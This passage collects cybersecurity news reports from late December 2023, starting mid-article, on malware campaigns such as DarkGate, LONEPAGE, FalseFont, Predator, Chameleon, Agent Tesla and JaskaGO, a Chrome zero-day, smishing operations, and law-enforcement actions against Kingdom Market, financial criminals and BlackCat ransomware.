Even as threat actors are experimenting with new malware strains, phishing campaigns have also been observed distributing known malware such as DarkGate and NetSupport RAT via email and compromised websites with fake update lures (aka RogueRaticate), particularly those from a cluster dubbed BattleRoyal.
Enterprise security firm Proofpoint said it identified at least 20 campaigns that used DarkGate malware between September and November 2023, before switching to NetSupport RAT earlier this month.
One attack sequence identified in early October 2023 particularly stands out for chaining two traffic delivery systems (TDSs) – 404 TDS and Keitaro TDS – to filter and redirect victims meeting their criteria to an actor-operated domain hosting a payload that exploited CVE-2023-36025 (CVSS score: 8.8), a high-severity Windows SmartScreen security bypass that was addressed by Microsoft in November 2023.
This implies BattleRoyal weaponized this vulnerability as a zero-day a month before it was publicly revealed by the tech giant.
DarkGate is designed to steal information and download additional malware payloads, while NetSupport RAT, which started off as a bona fide remote administration tool, has metamorphosed into a potent weapon wielded by malevolent actors to infiltrate systems and establish unfettered remote control.
"Cybercriminal threat actors [are] adopting new, varied, and increasingly creative attack chains – including the use of various TDS tools – to enable malware delivery," Proofpoint said.
"Additionally, the use of both email and fake update lures shows the actor using multiple types of social engineering techniques in an attempt to get users to install the final payload."
DarkGate has also been put to use by other threat actors like TA571 and TA577, both of which are known to disseminate a variety of malware, including AsyncRAT, NetSupport, IcedID, PikaBot, and QakBot (aka Qbot).
"TA577 for example, one of the most prominent Qbot distributors, returned to email threat data in September to deliver DarkGate malware and has since been observed delivering PikaBot in campaigns that typically have tens of thousands of messages," Selena Larson, senior threat intelligence analyst at Proofpoint, told The Hacker News.
UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware
23.12.23 Virus The Hacker News
The threat actor known as UAC-0099 has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE.
"The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct said in a Thursday analysis.
UAC-0099 was first documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2023, detailing its attacks against state organizations and media entities for espionage motives.
The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of LONEPAGE, a Visual Basic Script (VBS) malware that's capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware.
"During 2022-2023, the mentioned group received unauthorized remote access to several dozen computers in Ukraine," CERT-UA said at the time.
The latest analysis from Deep Instinct reveals that the use of HTA attachments is just one of three different infection chains, the other two of which leverage self-extracting (SFX) archives and bobby-trapped ZIP files. The ZIP files exploit the WinRAR vulnerability (CVE-2023-38831, CVSS score: 7.8) to distribute LONEPAGE.
In the former, the SFX file houses an LNK shortcut that's disguised as a DOCX file for a court summons while using the icon for Microsoft WordPad to entice the victim into opening it, resulting in the execution of malicious PowerShell code that drops the LONEPAGE malware.
The other attack sequence uses a specially crafted ZIP archive that's susceptible to CVE-2023-38831, with Deep Instinct finding two such artifacts created by UAC-0099 on August 5, 2023, three days after WinRAR maintainers released a patch for the bug.
"The tactics used by 'UAC-0099' are simple, yet effective," the company said. "Despite the different initial infection vectors, the core infection is the same — they rely on PowerShell and the creation of a scheduled task that executes a VBS file."
The development comes as CERT-UA warned of a new wave of phishing messages purporting to be outstanding Kyivstar dues to propagate a remote access trojan known as Remcos RAT. The agency attributed the campaign to UAC-0050.
Microsoft Warns of New 'FalseFont' Backdoor Targeting the Defense Sector
23.12.23 Virus The Hacker News
Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont.
The findings come from Microsoft, which is tracking the activity under its weather-themed moniker Peach Sandstorm (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten.
"FalseFont is a custom backdoor with a wide range of functionalities that allow operators to remotely access an infected system, launch additional files, and send information to its [command-and-control] servers," the Microsoft Threat Intelligence team said on X (previously Twitter).
The first recorded use of the implant was in early November 2023.
The tech giant further said that the latest development aligns with previous activity from Peach Sandstorm and demonstrates a continued evolution of the threat actor's tradecraft.
In a report published in September 2023, Microsoft linked the group to password spray attacks carried out against thousands of organizations globally between February and July 2023. The intrusions primarily singled out satellite, defense, and pharmaceutical sectors.
The end goal, the company said, is to facilitate intelligence collection in support of Iranian state interests. Peach Sandstorm is believed to have been active since at least 2013.
The disclosure comes as the Israel National Cyber Directorate (INCD) accused Iran and Hezbollah of attempting to unsuccessfully target Ziv Hospital through hacking crews named Agrius and Lebanese Cedar.
The agency also revealed details of a phishing campaign in which a fake advisory for a security flaw in F5 BIG-IP products is employed as a decoy to deliver wiper malware on Windows and Linux systems.
The lure for the targeted attack is a critical authentication bypass vulnerability (CVE-2023-46747, CVSS score: 9.8) that came to light in late October 2023. The scale of the campaign is currently unknown.
Experts Detail Multi-Million Dollar Licensing Model of Predator Spyware
23.12.23 Virus The Hacker News
A new analysis of the sophisticated commercial spyware called Predator has revealed that its ability to persist between reboots is offered as an "add-on feature" and that it depends on the licensing options opted by a customer.
"In 2021, Predator spyware couldn't survive a reboot on the infected Android system (it had it on iOS)," Cisco Talos researchers Mike Gentile, Asheer Malhotra, and Vitor Ventura said in a report shared with The Hacker News. "However, by April 2022, that capability was being offered to their customers."
Predator is the product of a consortium called the Intellexa Alliance, which includes Cytrox (subsequently acquired by WiSpear), Nexa Technologies, and Senpai Technologies. Both Cytrox and Intellexa were added to the Entity List by the U.S. in July 2023 for "trafficking in cyber exploits used to gain access to information systems."
The latest findings come more than six months after the cybersecurity vendor detailed the inner workings of Predator and its harmonious equation with another loader component called Alien.
"Alien is crucial to Predator's successful functioning, including the additional components loaded by Predator on demand," Malhotra told The Hacker News at the time. "The relationship between Alien and Predator is extremely symbiotic, requiring them to continuously work in tandem to spy on victims."
Predator, which can target both Android and iOS, has been described as a "remote mobile extraction system" that's sold on a licensing model that run into millions of dollars based on the exploit used for initial access and the number of concurrent infections, putting them out of reach of script kiddies and novice criminals.
Spyware such as Predator and Pegasus, which is developed by NSO Group, often rely on zero-day exploit chains in Android, iOS, and web browsers as covert intrusion vectors. But as Apple and Google continue to plug the security gaps, these exploit chains may be rendered ineffective, forcing them to go back to the drawing board.
However, it's worth noting that the companies behind mercenary surveillance tools can also procure either full or partial exploit chains from exploit brokers and fashion them into an operational exploit that can be employed to effectively breach target devices.
Another key aspect of Intellexa's business model is that offloads the work of setting up the attack infrastructure to the customers themselves, leaving it with room for plausible deniability should the campaigns come to light (as it inevitably does).
"The delivery of Intellexa's supporting hardware is done at a terminal or airport," the researchers said.
"This delivery method is known as Cost Insurance and Freight (CIF), which is part of the shipping industry's jargon ('Incoterms'). This mechanism allows Intellexa to claim that they have no visibility of where the systems are deployed and eventually located."
On top of that, Intellexa possesses "first-hand knowledge" of whether their customers are performing surveillance operations outside their own borders owing to the fact that the operations are intrinsically connected to the license, which, by default, is restricted to a single phone country code prefix.
This geographic limitation, nonetheless, can be loosened for an additional fee.
Cisco Talos noted that while public exposure of private-sector offensive actors and their campaigns have been successful at attribution efforts, it has had little impact on their ability to conduct and grow their business across the world, even if it may affect their customers, such as governments.
"It may increase the costs by making them buy or create new exploit chains but these vendors appear to have seamlessly acquired new exploit chains, enabling them to remain in business by jumping from one set of exploits to another as a means of initial access," the researchers said.
"What is needed is the public disclosure of technical analyses of the mobile spyware and tangible samples enabling public scrutiny of the malware. Such public disclosures will not only enable greater analyses and drive detection efforts but also impose development costs on vendors to constantly evolve their implants."
Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication
23.12.23 OS The Hacker News
Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy.
"Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News.
Chameleon was previously documented by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks.
The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation Office (ATO) and a cryptocurrency trading platform called CoinSpot, in an attempt to lend them a veil of credibility.
The latest findings from ThreatFabric show that the banking trojan is now being delivered via Zombinder, an off-the-shelf dropper-as-a-service (DaaS) that's sold to other threat actors and which can be used to "bind" malicious payloads to legitimate apps.
Although the offering was suspected to have been shut down earlier this year, it resurfaced last month, advertising capabilities to bypass the 'Restricted Settings' feature in Android to install malware on devices and obtain access to the accessibility service.
Both the malicious artifacts distributing Chameleon masquerade as the Google Chrome web browser. Their package names are listed below -
Z72645c414ce232f45.Z35aad4dde2ff09b48
com.busy.lady
A notable feature of the enhanced variant is its ability to conduct Device Takeover (DTO) fraud, which leverages the accessibility service to perform unauthorized actions on the victim's behalf.
But in order to trick users into enabling the setting, the malware checks the Android version on the installed device and if it's found to be Android 13 or later, prompts the user to turn it on.
"Upon receiving confirmation of Android 13 Restricted Settings being present on the infected device, the banking trojan initiates the loading of an HTML page," ThreatFabric explained. "The page is guiding users through a manual step-by-step process to enable the accessibility service on Android 13 and higher."
Another new addition is the use of Android APIs to disrupt the biometric operations of the targeted device by covertly transitioning the lock screen authentication mechanism to a PIN so as to allow the malware to "unlock the device at will" using the accessibility service.
"The emergence of the new Chameleon banking trojan is another example of the sophisticated and adaptive threat landscape within the Android ecosystem," the company said. "Evolving from its earlier iteration, this variant demonstrates increased resilience and advanced new features."
The development comes as Zimperium revealed that 29 malware families – 10 of them new – targeted 1,800 banking applications across 61 countries over the past year. The new active families include Nexus, Godfather, PixPirate, Saderat, Hook, PixBankBot, Xenomorph v3, Vultur, BrasDex, and GoatRAT.
The U.S. top countries targeted comprise the U.S. (109 bank apps), the U.K. (48), Italy (44), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), Canada (17), and Brazil (11). The most targeted financial services apps are PhonePe (India), WeChat, Bank of America, Well Fargo, (U.S.), Binance (Malta), Barclays (U.K.), QNB Finansbank (Turkey), and CaixaBank (Spain).
"Traditional banking applications remain the prime target, with a staggering 1103 apps – accounting for 61% of the targets – while the emerging FinTech and Trading apps are now in the crosshairs, making up the remaining 39%," the company said.
New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide
23.12.23 Virus The Hacker News
A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world.
The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan.
IBM Security Trusteer said it detected the campaign in March 2023.
"Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said.
Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's suspected the malware is delivered to targets by some other means, e.g., via phishing emails or malvertising.
When the victim visits a bank website, the login page is altered to incorporate malicious JavaScript capable of harvesting the credentials and one-time passwords (OTPs). The script is obfuscated to conceal its true intent.
"This web injection doesn't target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks," Langus said.
"The script's behavior is highly dynamic, continuously querying both the command-and-control (C2) server and the current page structure and adjusting its flow based on the information obtained."
The response from the server determines its next course of action, allowing it to erase traces of the injections, and insert fraudulent user interface elements to accept OTPs to bypass security protections as well as introduce an error message saying online banking services will be unavailable for a time period of 12 hours.
IBM said it's an attempt to dissuade the victims from logging in to their accounts, providing the threat actors with a window of opportunity to seize control of the accounts and perform unauthorized actions.
While the exact origins of the malware are presently not known, the indicators of compromise (IoCs) suggest a possible connection to a known stealer and loader family known as DanaBot, which has been propagated via malicious ads on Google Search and has acted as acted an initial access vector for ransomware.
"This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus said.
The development comes as Sophos shed more light on a pig butchering scheme in which potential targets are lured into investing in a fake liquidity mining service, uncovering a broader set of scams that has netted the actors nearly $2.9 million worth of cryptocurrency this year as of November 15 from 90 victims.
"They appear to have been run by three separate threat activity groups using identical fraudulent decentralized finance ('DeFi') app sites, suggesting that they are part of or affiliated with a single [Chinese] organized crime ring," security researcher Sean Gallagher said.
According to data shared by Europol in its Internet Organized Crime Threat Assessment (IOCTA) earlier this week, investment fraud and business email compromise (BEC) fraud remain the most prolific online fraud schemes.
"A concerning threat around investment fraud is its use in combination with other fraud schemes against the same victims," the agency said.
"Investment fraud is sometimes linked to romance scams: criminals slowly build a relationship of trust with the victim and then convince them to invest their savings on fraudulent cryptocurrency trading platforms, leading to large financial losses."
On a related note, cybersecurity company Group-IB said it identified 1,539 phishing websites impersonating postal operators and delivery companies since the start of November 2023. They are suspected to be created for a single scam campaign.
In these attacks, users are sent SMS messages that mimic well-known postal services and are prompted to visit the counterfeit websites to enter their personal and payment details, citing urgent or failed deliveries.
The operation is also notable for incorporating various evasion methods to fly under the radar. This includes limiting access to the scam websites based on geographic locations, making sure that they work only on specific devices and operating systems, and shortening the duration for which they are live.
"The campaign affects postal brands in 53 countries," Group-IB said. "Most of the detected phishing pages target users in Germany (17.5%), Poland (13.7%), Spain (12.5%), U.K. (4.2%), Turkey (3.4%) and Singapore (3.1%)."
German Authorities Dismantle Dark Web Hub 'Kingdom Market' in Global Operation
23.12.23 BigBrothers The Hacker News
German law enforcement has announced the disruption of a dark web platform called Kingdom Market that specialized in the sales of narcotics and malware to "tens of thousands of users."
The exercise, which involved collaboration from authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said.
Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents.
As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany.
Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3% commission for processing the sales of the illicit goods.
"The operators of 'Kingdom Market' are suspected of commercially operating a criminal trading platform on the Internet and of illicit trafficking in narcotics," the BKA said, adding an investigation into the seized server infrastructure is ongoing.
In addition to the seizure, one person connected to the running of Kingdom Market has been charged in the U.S. with identity theft and money laundering. Alan Bill, who also goes by the aliases Vend0r and KingdomOfficial, has been described as a Slovakian national.
The development comes days after another coordinated law enforcement effort saw the dismantling of the BlackCat ransomware's dark web infrastructure, prompting the group to respond to the seizure of its data leak site by wresting control of the page, claiming they had "unseized" it.
Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware
23.12.23 Exploit The Hacker News
Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla.
The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's Equation Editor that could result in code execution with the privileges of the user.
The findings, which come from Zscaler ThreatLabz, build on prior reports from Fortinet FortiGuard Labs, which detailed a similar phishing campaign that exploited the security flaw to deliver the malware.
"Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction," security researcher Kaivalya Khursale said.
The first payload is an obfuscated Visual Basic Script, which initiates the download of a malicious JPG file that comes embedded with a Base64-encoded DLL file. This steganographic evasion tactic was previously also detailed by McAfee Labs in September 2023.
The concealed DLL is subsequently injected into RegAsm.exe, the Windows Assembly Registration Tool, to launch the final payload. It's worth noting that the executable has also been abused to load Quasar RAT in the past.
Agent Tesla is a .NET-based advanced keylogger and remote access trojan (RAT) that's equipped to harvest sensitive information from compromised hosts. The malware then communicates with a remote server to extract the collected data.
"Threat actors constantly adapt infection methods, making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape," Khursale said.
The development comes as old security flaws become new attack targets for threat actors. Earlier this week, Imperva revealed that a three-year-old flaw in Oracle WebLogic Server (CVE-2020-14883, CVSS score: 7.2) is being utilized by the 8220 Gang to deliver cryptocurrency miners.
It also coincides with an uptick in DarkGate malware activity after it began to be advertised earlier this year as a malware-as-a-service (MaaS) offering and as a replacement for QakBot following its takedown back in August 2023.
"The technology sector is the most impacted by DarkGate attack campaigns," Zscaler said, citing customer telemetry data.
"Most DarkGate domains are 50 to 60 days old, which may indicate a deliberate approach where threat actors create and rotate domains at specific intervals."
Phishing campaigns have also been discovered targeting the hospitality sector with booking-related email messages to distribute information stealer malware such as RedLine Stealer or Vidar Stealer, according to Sophos.
"They initially contact the target over email that contains nothing but text, but with subject matter a service-oriented business (like a hotel) would want to respond to quickly," researchers Andrew Brandt and Sean Gallagher said.
"Only after the target responds to the threat actor's initial email does the threat actor send a followup message linking to what they claim is details about their request or complaint."
Stealers and trojans notwithstanding, phishing attacks have further taken the form of bogus Instagram "Copyright Infringement" emails to steal users' two-factor authentication (2FA) backup codes via fraudulent web pages with an aim to bypass account protections, a scheme called Insta-Phish-A-Gram.
"The data attackers retrieve from this kind of phishing attack can be sold underground or used to take over the account," the cybersecurity firm said.
Urgent: New Chrome Zero-Day Vulnerability Exploited in the Wild - Update ASAP
21.12.23 Vulnerebility The Hacker News
Google has rolled out security updates for the Chrome web browser to address a high-severity zero-day flaw that it said has been exploited in the wild.
The vulnerability, assigned the CVE identifier CVE-2023-7024, has been described as a heap-based buffer overflow bug in the WebRTC framework that could be exploited to result in program crashes or arbitrary code execution.
Clément Lecigne and Vlad Stolyarov of Google's Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw.
No other details about the security defect have been released to prevent further abuse, with Google acknowledging that "an exploit for CVE-2023-7024 exists in the wild."
The development marks the resolution of the eighth actively exploited zero-day in Chrome since the start of the year -
CVE-2023-2033 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-2136 (CVSS score: 9.6) - Integer overflow in Skia
CVE-2023-3079 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-4762 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-4863 (CVSS score: 8.8) - Heap buffer overflow in WebP
CVE-2023-5217 (CVSS score: 8.8) - Heap buffer overflow in vp8 encoding in libvpx
CVE-2023-6345 (CVSS score: 9.6) - Integer overflow in Skia
A total of 26,447 vulnerabilities have been disclosed so far in 2023, surpassing the previous year by over 1,500 CVEs, according to data compiled by Qualys, with 115 flaws exploited by threat actors and ransomware groups.
Remote code execution, security feature bypass, buffer manipulation, privilege escalation, and input validation and parsing flaws emerged as the top vulnerability types.
Users are recommended to upgrade to Chrome version 120.0.6099.129/130 for Windows and 120.0.6099.129 for macOS and Linux to mitigate potential threats.
Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.
Remote Encryption Attacks Surge: How One Vulnerable Device Can Spell Disaster
21.12.23 Attack The Hacker News
Ransomware groups are increasingly switching to remote encryption in their attacks, marking a new escalation in tactics adopted by financially motivated actors to ensure the success of their campaigns.
"Companies can have thousands of computers connected to their network, and with remote ransomware, all it takes is one underprotected device to compromise the entire network," Mark Loman, vice president of threat research at Sophos, said.
"Attackers know this, so they hunt for that one' weak spot' — and most companies have at least one. Remote encryption is going to stay a perennial problem for defenders."
Remote encryption (aka remote ransomware), as the name implies, occurs when a compromised endpoint is used to encrypt data on other devices on the same network.
In October 2023, Microsoft revealed that around 60% of ransomware attacks now involve malicious remote encryption in an effort to minimize their footprint, with more than 80% of all compromises originating from unmanaged devices.
"Ransomware families known to support remote encryption include Akira, ALPHV/BlackCat, BlackMatter, LockBit, and Royal, and it's a technique that's been around for some time – as far back as 2013, CryptoLocker was targeting network shares," Sophos said.
A significant advantage to this approach is that it renders process-based remediation measures ineffective and the managed machines cannot detect the malicious activity since it is only present in an unmanaged device.
The development comes amid broader shifts in the ransomware landscape, with the threat actors adopting atypical programming languages, targeting beyond Windows systems, auctioning stolen data, and launching attacks after business hours and at weekends to thwart detection and incident response efforts.
Sophos, in a report published last week, highlighted the "symbiotic – but often uneasy – relationship" between ransomware gangs and the media, as a way to not only attract attention, but also to control the narrative and dispute what they view as inaccurate coverage.
This also extends to publishing FAQs and press releases on their data leak sites, even including direct quotes from the operators, and correcting mistakes made by journalists. Another tactic is the use of catchy names and slick graphics, indicating an evolution of the professionalization of cyber crime.
"The RansomHouse group, for example, has a message on its leak site specifically aimed at journalists, in which it offers to share information on a 'PR Telegram channel' before it is officially published," Sophos noted.
While ransomware groups like Conti and Pysa are known for adopting an organizational hierarchy comprising senior executives, system admins, developers, recruiters, HR, and legal teams, there is evidence to suggest that some have advertised opportunities for English writers and speakers on criminal forums.
"Media engagement provides ransomware gangs with both tactical and strategic advantages; it allows them to apply pressure to their victims, while also enabling them to shape the narrative, inflate their own notoriety and egos, and further 'mythologize' themselves," the company said.
Alert: Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave
21.12.23 Attack The Hacker News
The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country.
"These criminals send malicious links to their victims' mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send," Resecurity said in a report published this week. "This helps them protect the fake website's domain and hosting location."
Smishing Triad was first documented by the cybersecurity company in September 2023, highlighting the group's use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud.
The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside engaging in Magecart-style attacks on e-commerce platforms to inject malicious code and pilfer customer data.
"This fraud-as-a-service (FaaS) model enables 'Smishing Triad' to scale their operations by empowering other cybercriminals to leverage their tooling and launch independent attacks," Resecurity noted.
The latest attack wave is designed to target individuals who have recently updated their residence visas with harmful messages. The smishing campaign applies to both Android and iOS devices, with the operators likely using SMS spoofing or spam services to perpetrate the scheme.
Recipients who click on the embedded link the message are taken to a bogus, lookalike website ("rpjpapc[.]top") impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter their personal information such as names, passport numbers, mobile numbers, addresses, and card information.
What makes the campaign noteworthy is the use of a geofencing mechanism to load the phishing form only when visited from UAE-based IP addresses and mobile devices.
"The perpetrators of this act may have access to a private channel where they obtained information about UAE residents and foreigners living in or visiting the country," Resecurity said.
"This could be achieved through third-party data breaches, business email compromises, databases purchased on the dark web, or other sources."
Smishing Triad's latest campaign coincides with the launch of a new underground market known as OLVX Marketplace ("olvx[.]cc") that operates on the clear web and claims to sell tools to carry out online fraud, such as phish kits, web shells, and compromised credentials.
"While the OLVX marketplace offers thousands of individual products across numerous categories, its site administrators maintain relationships with various cybercriminals who create custom toolkits and can obtain specialized files, thereby furthering OLVX's ability to maintain and attract customers to the platform," ZeroFox said.
Cyber Criminals Misuse Predator Bot Detection Tool for Phishing Attacks#
The disclosure comes as Trellix revealed how threat actors are leveraging Predator, an open-source tool designed to combat fraud and identify requests originating from automated systems, bots, or web crawlers, as part of various phishing campaigns.
The starting point of the attack is a phishing email sent from a previously compromised account and containing a malicious link, which, when clicked, checks if the incoming request is coming from a bot or a crawler, before redirecting to the phishing page.
The cybersecurity firm said it identified various artifacts where the threat actors repurposed the original tool by providing a list of hard-coded links as opposed to generating random links dynamically upon detecting a visitor is a bot.
"Cyber criminals are always looking for new ways to evade detection from organizations' security products," security researcher Vihar Shah and Rohan Shah said. "Open-source tools such as these make their task easier, as they can readily use these tools to avoid detection and more easily achieve their malicious goals."
3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals
21.12.23 Crime The Hacker News
A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries.
The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.
In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets.
"Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea's National Police Agency," Interpol, an international police organization, said.
Investment fraud, business email compromise, and e-commerce fraud accounted for 75% of the cases, the agency added, stating it detected a new scam in South Korea that involved the sale of non-fungible tokens (NFTs) with promises of huge returns, only for the operators to stage a rug pull and abruptly abandon the project.
Another novel trend concerned the use of artificial intelligence (AI) and deepfake technology to elevate the authenticity of scams, enabling criminals to impersonate people known to the targets, as well as deceive, defraud, harass, and extort victims through impersonation scams, online sexual blackmail, and investment fraud.
HAECHI-IV comes more than a year after HAECHI-III, which led to the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering.
"The seizure of $300 million represents a staggering sum and clearly illustrates the incentive behind today's explosive growth of transnational organized crime," Interpol's Stephen Kavanagh said. "This vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide."
New Go-Based JaskaGO Malware Targeting Windows and macOS Systems
21.12.23 Virus The Hacker News
A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems.
AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server."
Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools.
Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar.
In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumerating running processes, and downloading additional payloads.
It's also capable of modifying the clipboard to facilitate cryptocurrency theft by substituting wallet addresses and siphoning files and data from web browsers.
"On macOS, JaskaGO employs a multi-step process to establish persistence within the system," security researcher Ofer Caspi said, outlining its capabilities to run itself with root permissions, disable Gatekeeper protections, and create a custom launch daemon (or launch agent) to ensure it's automatically launched during system startup.
It's currently not known how the malware is distributed and if it entails phishing or malvertising lures. The scale of the campaign remains unclear as yet.
"JaskaGO contributes to a growing trend in malware development leveraging the Go programming language," Caspi said.
"Go, also known as Golang, is recognized for its simplicity, efficiency, and cross-platform capabilities. Its ease of use has made it an attractive choice for malware authors seeking to create versatile and sophisticated threats."
FBI Takes Down BlackCat Ransomware, Releases Free Decryption Tool
21.12.23 Ransom The Hacker News
The U.S. Justice Department (DoJ) has officially announced the disruption of the BlackCat ransomware operation and released a decryption tool that more than 500 affected victims can use to regain access to files locked by the malware.
Court documents show that the U.S. Federal Bureau of Investigation (FBI) enlisted the help of a confidential human source (CHS) to act as an affiliate for the BlackCat group and gain access to a web panel used for managing the gang's victims, in what's a case of hacking the hackers.
The confiscation effort involved collaboration and assistance from multiple law enforcement agencies from the U.S., Germany, Denmark, Australia, the U.K., Spain, Switzerland, and Austria.
BlackCat, also called ALPHV, GOLD BLAZER, and Noberus, first emerged in December 2021 and has since gone on to be the second most prolific ransomware-as-a-service variant in the world after LockBit. It's also the first Rust-language-based ransomware strain spotted in the wild.
The development puts an end to speculations of a rumored law enforcement action after its dark web leak portal went offline on December 7, only to resurface five days later with just a single victim.
The FBI said it worked with dozens of victims in the U.S. to implement the decryptor, saving them from ransom demands totaling about $68 million, and that it also gained insight into the ransomware's computer network, allowing it to collect 946 public/private key pairs used to host the TOR sites operated by the group and dismantle them.
One important thing to note here is that creating a hidden service with the .onion URL on the TOR anonymization network generates a unique key pair comprising a private and public key (aka the identifier) that can be used to access and control the URL.
An actor who is in possession of the key pair can, therefore, broadcast a new route redirecting traffic for the .onion site to a different server under their control.
BlackCat, like several other ransomware gangs, uses a ransomware-as-a-service model involving a mix of core developers and affiliates, who rent out the payload and are responsible for identifying and attacking high-value victim institutions.
It also employs the double extortion scheme to put pressure on victims to pay up by exfiltrating sensitive data prior to encryption.
"BlackCat affiliates have gained initial access to victim networks through a number of methods, including leveraging compromised user credentials to gain initial access to the victim system," the DoJ said.
In all, the financially motivated actor is estimated to have compromised the networks of more than 1,000 victims across the world to earn nearly $300 million in illegal revenues as of September 2023.
Image Source: Resecurity
If anything, the takedown has proven to be a blessing in disguise for rival groups like LockBit, which is already capitalizing on the situation by actively recruiting displaced affiliates, offering its data leak site to resume victim negotiations.
Speaking to malware research group vx-underground, a BlackCat spokesperson said "they have moved their servers and blogs," claiming that the law enforcement agencies only had access to a "stupid old key" for the old blog site which was deleted by the group a long time ago and has since not been used.
The threat actor's newest leak website remains operational as of writing. "On December 13, the group published the first victim to its new leak site," Secureworks said. "As of December 19, five victims were posted to the new site, demonstrating the group retained some operational capacity."
However, hours after the takedown, the BlackCat group took steps to "unseize" the main leak site using the same set of cryptographic keys necessary to host the hidden service on the TOR network and post its own seizure notice.
It has also given affiliates the green light to infiltrate critical infrastructure entities such as hospitals and nuclear power plants as well as other targets with the exception of those inside the Commonwealth of Independent States (CIS) as a retaliatory measure. The FBI has since re-seized the website.
"The threats seem like 'now you've done it' posturing but, this group has a documented history of attacking healthcare and energy infrastructure targets already, so it feels like bluster," Secureworks Counter Threat Unit (CTU) told The Hacker News.
"Given that such activity appears more likely to bring law enforcement attention – which is why many groups explicitly avoid it – it seems unlikely that affiliates will choose to specifically target such organizations, especially as ransomware is a crime of opportunity for the most part and based on available access to victim networks."
"That said, some less risk averse affiliates may be more willing to target energy and healthcare organizations. The flip side is that it is just as likely that the uncertainty caused by the law enforcement disruption will drive affiliates away from BlackCat into the arms of other ransomware operators, such as LockBit. Such interventions breed distrust and paranoia among ransomware group members and affiliates."
